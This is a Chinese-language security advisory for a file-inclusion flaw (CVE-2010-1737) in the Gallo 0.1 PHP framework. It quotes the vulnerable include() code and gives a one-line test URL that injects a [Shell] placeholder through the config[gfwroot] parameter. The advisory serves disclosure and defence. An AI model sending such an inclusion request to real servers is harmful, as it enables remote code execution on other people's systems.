Gallo config[gfwroot]参数文件包含漏洞
发布日期:2010-05-03
更新日期:2010-05-07
受影响系统:krlosaqp Gallo 0.1
描述:
BUGTRAQ ID:
39890
CVE(CAN) ID:
CVE-2010-1737
Gallo是一个小型的PHP框架。
Gallo没有正确地过滤提交给core/includes/gfw_smarty.php页面的config[gfwroot]参数便用于包含文件:
<?php
include ($config['gfwroot'] . 'libs/smarty/Smarty.class.php');
class GfwSmarty extends Smarty {
function GfwSmarty () {
global $config;
$this->Smarty();
$this->template_dir = $config['approot'] . 'sites/main/templates/';
$this->compile_dir = $config['approot'] . 'compiles/';
$this->config_dir = $config['approot'] . 'configs/';
$this->cache_dir = $config['approot'] . 'cache/';
$this->compile_check = $config['compile'];
$this->force_compile = $config['compile'];
$this->caching = $config['caching'];
$this->assign('app_name', 'Maps');
}
}
?>
远程攻击者可以通过提交恶意请求导致包含任意本地或外部资源。成功攻击要求打开了register_globals。
<*来源:cr4wl3r
链接:
http://secunia.com/advisories/39706
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/[Gallo_path]/core/includes/gfw_smarty.php?config[gfwroot]=[Shell]建议:
厂商补丁:
krlosaqp
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/gallo/浏览次数:1908
严重程度:0(网友投票)
